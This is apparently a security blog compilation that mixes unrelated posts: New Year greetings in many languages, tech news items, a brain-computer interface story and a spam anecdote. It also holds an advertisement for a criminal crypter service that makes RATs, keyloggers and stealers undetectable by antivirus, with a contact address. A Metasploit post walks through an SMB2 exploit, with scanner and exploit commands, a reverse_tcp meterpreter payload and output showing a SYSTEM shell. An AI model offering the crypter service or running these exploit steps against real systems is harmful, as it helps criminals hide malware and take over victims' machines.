Special Security

Bonne année en Françe :
En Alsacien : e glëckliches nëies OU güets nëies johr
En Basque : urte berri on
En Breton : bloavezh mat OU bloavez mad
En Corse : pace e salute
En Provencal : bòna annada
En Provencal rhodanien : bono annado
En Francique Lorrain : Proscht nei Johr OU Beschte Wìnsch fer's neije Johr
En Languedocien : bona annada
Bonne année en Créole :
En Créole ANTILLAIS : bon lanné
En Créole GUADELOUPÉEN : bonne année
En Créole GUYANAIS : bon nannen OU bon lannen
En Créole HAITIEN : bònn ané
En Créole MARTINIQUAIS : bon lanné OU bonanné
En Créole MAURICIEN : banané
En Créole RÉUNIONNAIS : bone-érèz ané
En Créole SEYCHELLOIS : mon swet zot la bonn anen
Bonne année dans le monde entier :
En Anglais : Happy new year
En Arabe : aam saiid. sana saiida
En Japonais : akemashite omedetô
En Chinois : Sun nien fai lok
Pour le Chinois Mandarin : Xin nian yu kuai
En Italien : felice anno nuovo OU buon anno
En Portugais : feliz ano novo
En Danois : Godt Nytår
En Allemand : Gutes Neues Jahr
En Iran : Aide shoma mobarak
En Albanais : Gëzuar vitin e ri
En Hawaiien : Hauoli Makahiki Hou
En Hebreux : Shanah tovah
En Vietnamien : Nyob zoo xyoo tshiab
En Indonesien : Elamat Tahun Baru
En Afrikaans : gelukkige nuwejaar
En Arménien : shnorhavor nor tari
En Azeri : yeni iliniz mubarek
En Bambara : bonne année
En Bas Saxon : gelükkig nyjaar
En Bengali : subho nababarsho
En Berbère : asgwas amegas
En Beti : mbembe mbu
En Bioelorusse : Z novym hodam
En Birman : hnit thit ku mingalar pa
En Bobo : bonne année
En Bosniaque : sretna nova godina
En Bulgare : chestita nova godina
En Cantonais : kung hé fat tsoi
En Catalan : bon any nou
En Coréen : seh heh bok mani bat uh seyo
En Croate : sretna nova godina
En Espagnol : feliz año nuevo
En Esperanteo : felicxan novan jaron
En Estonien : head uut aastat
En Feroien : gott nýggjár
En Finnois : onnellista uutta vuotta
En Flamand : gelukkig Nieuwjaar
En Frison : lokkich neijier
En Frioulan : bon an
En Gaélique d'Ecosse : bliadhna mhath ur
En Gaélique d'Irlande : ath bhliain faoi mhaise
En Galicien : feliz aninovo
En Gallo : Bónn anaèy
En Gallois :blwyddyn newydd dda
En Géorgien : gilocavt akhal tsels
En Grec : kali chronia OU kali xronia
En Gujarati : sal mubarak
En Guarani :rogüerohory año nuévo-re
En Hindi : nav varsh ki subhkamna
En Hmong : nyob zoo xyoo tshiab
En Hongrois : boldog új évet
En Indonésien : selamat tahun baru
En Islandais : farsælt komandi ár
En Javanais : sugeng warsa enggal
En Kabyle : asseguèsse-ameguèsse
En Kannada : hosa varshada shubhaashayagalu
EN Kazakh : zhana zhiliniz kutti bolsin
En Khmer : sur sdei chhnam thmei
En Kirundi : umwaka mwiza
En Kurde : sala we ya nû pîroz be
En Lao : sabai di pi mai
En Latin : felix sit annus novus
En Letton : laimigu Jauno gadu
En Ligure : feliçe annu nœvu
En Lingala : mbula ya sika elamu na tonbeli yo OU bonana
En Lituanien : laimingu Naujuju Metu
En Luxembourgeoins : e gudd neit Joër
En Macédonien : srekna nova godina
En Malais : selamat tahun baru
En Malgache : arahaba tratry ny taona
En Maltais : is-sena t-tajba
En Maori : kia hari te tau hou
En Marathi : navin varshaachya hardik shubbheccha
En Mongol : shine jiliin bayariin mend hurgeye
En Moré : wênd na kô-d yuum-songo
En Néerlandais : gelukkig Nieuwjaar
En Occitan : bona annada
En Ourdou : naya saal mubarik
En Ouzbek : yangi yilingiz qutlug' bo'lsin
En Persan : sâle no mobârak
En Polonais : szczesliwego nowego roku
En Romanche : bun di bun onn
En Romani : bangi vasilica baxt
En Roumain : un an nou fericit OU la multi ani
En Russe : novim godom
En Samoan : ia manuia le tausaga fou
En Sango : nzoni fini ngou
En Sarde : bonu annu nou
En Serbe : srecna nova godina
En Shimaroé : mwaha mwema
En Shona : goredzwa rakanaka
En Sindhi : nain saal joon wadhayoon
En Sinhala : suba aluth avuruddak vewa
En Slovaque : stastlivy novy rok
En Slovène : srecno novo leto
En Sobota : dobir leto
En Sranan : wan bun nyun yari
En Suédois : gott nytt år
En Suisse-Allemand : es guets Nöis
En Swahili : mwaka mzuri OU heri ya mwaka mpya
En Tagalog : manigong bagong taon
En Tahitien : ia orana i te matahiti api
En Tamoul :iniya puthandu nalVazhthukkal
En Tatar : yaña yil belän
En Tchèque : štastný nový rok
En Telugu : nuthana samvathsara subhakankshalu
En Thai : sawatdii pimaï
En Tibétain : tashi délek
En Turc : yeni yiliniz kutlu olsun
En Udmurt : Vyl Aren
En Ukrainien : Z novym rokom
En Vietnamien : Cung Chúc Tân Niên OU Cung Chúc Tân Xuân
En Wallon : bone annéye OU bone annéye èt bone santéye
En Wolof : dewenati
En Yiddish : a gut yohr

Young American woman travels over to Jerusalem to meet some friends, see the sights, live the life. Overzealous border security officers ask her a bunch of questions, take issue with her answers, and a few well-placed bullets later she is allowed entry into the country with a somewhat altered MacBook in tow. So what can we all learn from this incident? Firstly, back up all the data you consider important; B, Israeli policemen don't mess about; and 3, distressed laptops look gorgeous no matter how they got there -- just look at the way the glass trackpad has wrinkled up from the force of the bullet penetrating near it, it's a borderline work of art. The young lady in question has been promised compensation, but lest you think this is a one one-off you can see pictures of an equally dead Dell at the Flickr link below. We've got a couple more close-ups of the ravaged MacBook after the break.



Source:engadget

Just saw this article and it seems very interesting
in my point of view.

It talks about using Twitter API to spread malware and
other malicious scripts.

To improve my Unmask Parasites online service I regularly visit compromised sites and analyze malicious content cybercriminals inject into legitimate web pages. I have to admit that hackers are very creative and I learn new tricks every week.
Today, I’ve found an interesting obfuscated script that used Twitter API to trigger malicious process.

A resourceful hacker was able to create a fake PayPal account to gather sensitive financial information that bypassed Microsoft Internet Explorer, Apple Safari, and Google Chrome security. The hack was designed to pop up a PayPal page with an artificial SSL certificate prompting users to submit sensitive information to the hacker without warning.

Noticeably missing from the list is Mozilla Firefox, which does not seem to be affected by the hack. Dan Gooden of The Register stated that “Even though the certificate is demonstrably forged, it can be used with a previously available hacking tool called SSL Sniff to cause all three browsers to display a spoofed page with no warnings, even when its address begins with ‘http.’”

To make matters worse, Microsoft apparently knew about this problem back in June when a hacker attending the Black Hat Security Convention exploited the weakness. A spokesman from Microsoft stated “Microsoft is investigating a vulnerability in SSL in Windows presented during Black Hat, Once we’re done investigating, we will take appropriate actions to protect customers.” Until the issue is resolved experts recommend that anyone using PayPal go to the site directly rather than risk getting duped into putting your information of a fake web page.

(Source: Seattle Pi)

New added:

” Crypte My Program “

Is a new service which indicates the following :

- We make a private FUD ( clean ) encryption for any program you want ( RAT , Crypter , binder , Downloader , keylogger , stealer Or Any Other Hacking tool ) .

- You have to send us your program unpacked , then we check it and we give you the price of the FUD private encryption .

- Payment method is western union .

Bonus:

- Every customer has 3 free updates for his encryption .

- If you are interested in the service please leave a comment of your program name and your e-mail address here in the topic or contact us at : HilEx.ask@hotmail.com .

Detections
a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

- For more info. about the new service please contact us at : HilEx.ask@hotmail.com or leave a comment here in the topic .

The last 48 hours has been a whirlwind of development at the Metasploit Project as we prepare for the 3.3 stable release. Efrain Torres completed the screenshot feature of the espia Metepreter module. This command only works when the process meterpreter is executing inside has access to the active desktop (like explorer.exe). You can see an example of this below:


meterpreter > ps


Process list


============

PID Name Path
--- ---- ----
204 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
[ snipped ]
1736 Explorer.EXE C:\WINDOWS\Explorer.EXE
3348 sol.exe C:\WINDOWS\system32\sol.exe


meterpreter > migrate 1736
[*] Migrating to 1736...
[*] Migration completed successfully.


meterpreter > screenshot /tmp/boom.bmp
[*] Image saved to /tmp/boom.bmp
Opening browser to image.





This morning Stephen Fewer released his long-awaited SMB2 code execution module for the Metasploit Framework. He plans to publish a whitepaper in the near future that discusses the exploit technique and the newly written Vista/2008 ring0 to ring3 stager code. This module is available in the 3.3-dev tree and supports Vista SP1/SP2 and 2008 SP1/SP2 (but not R2) with the same offsets and addresses. Keep in mind that the best workaround for this still-unpatched flaw is to disable the SMB2 protocol. The auxiliary module "auxiliary/scanner/smb/smb2" can be used to scan the network for systems that still have SMB2 enabled (shown below):


msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run


[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours


When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.


Now that we have identified two systems with SMB2 enabled, its exploit time!


msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit


[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)...
[*] Sending the exploit packet (854 bytes)...
[*] Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)


meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Voila! A great way to justify disabling SMB2 across your network.


Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.


For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:


C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev


We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.

Operating a computer by thought alone was unimaginable ten years ago, but this incredible feat is now possible. Financed by the ANR (the French national research agency) OpenViBE is the first French multi-partner project on brain-computer interfaces. With support from INRIA (the French national institute for research in computer science and control) and Inserm (the French national institute of health and medical research), OpenViBE has successfully perfected a free software programme with highly promising applications.

A Brain-Computer Interface, or BCI, enables its user to send commands to a computer or machine only by means of brain activity. In 2005, while research in this field was almost non-existent in France, research scientists initiated a project called OpenViBE to carry out innovative research on brain-computer interfaces. By combining their knowledge on the workings of the brain with their technical and computer science expertise, the researchers succeeded in perfecting an ergonomic, easy to use programme four years after the project started.

The result of the eponymous project, OpenViBE is a genuine "interface" designed to translate what takes place in the brain into a command for a computer. In producing a support of this kind, the researchers at Inserm and INRIA have opened up new prospects in a rapidly developing field of research, as regards not only signal processing and the optimisation of Man-Machine Interfaces, but also research on communication aids for people with reduced mobility, the treatment of certain neurological disorders and our understanding of how the brain works.

Four applications using the properties of the OpenViBE programme have already been developed by scientists. Three prototypes involve virtual reality and video games. The user, wearing helmets equipped with electrodes, will be able to pilot a space ship, play handball or move around in a virtual world, depending on the application. A fourth prototype, designed as a communication aid for people with reduced mobility, makes it possible to write on a computer simply by using thought.

Source:inria.fr

Today, for the second time we received a mail (call it spam) from a company named Owen Media Partners. The mail is basically saying that given the fact that they saw a link in our archives pointing at a website similar to their own, they request us to add also their URL in our archives.

I bet they didn't understand what a defacement archive is. Given the fact that in two weeks I got their spam mail twice, we decided to make them happy, and to host a link to their website... by making this news. We are always keen to help proactive people promoting their activities!

Hey, if you didn't realize yet, we are a bit ironical here.

Here is the hilarious text of the email we just received (at least for us, given that zone-h is a cybercrime archive)...

*******************************************

Subject:Link Request to MacRAE's Blue Book

From: cparent@owen-media.com

Good afternoon,

My name is Chris Parent and I work at a company called Owen Media Partners. We are a publisher of a variety of leading business and industrial sites across North America and Europe.

I have noticed that your organization’s website, http://www.zone-h.org/archive/defacer=McM4nus, is linked to http://www.sccc.org/ which is a chamber of commerce in the U.S. I am writing to you to request that you please also link to our U.S. industrial business site called MacRAE’s Blue Book at http://www.macraesbluebook.com/.

Why link to http://www.macraesbluebook.com/?

· MacRAE’s Blue Book is America’s leading industrial website (comScore, March 2009) with over 33 million annual visitors.

· The site plays a key role in connecting buyers and sellers of industrial products.

· The site features a rich, relevant and searchable database of industrial products and the suppliers, distributors and manufacturers of these products.

More information about us can be viewed at www.macraesbluebook.com/pages/about.cfm.

*************************************

Here we go! We published a link to your website. Happy now?

Bloody spammers...

Source:zone-h.org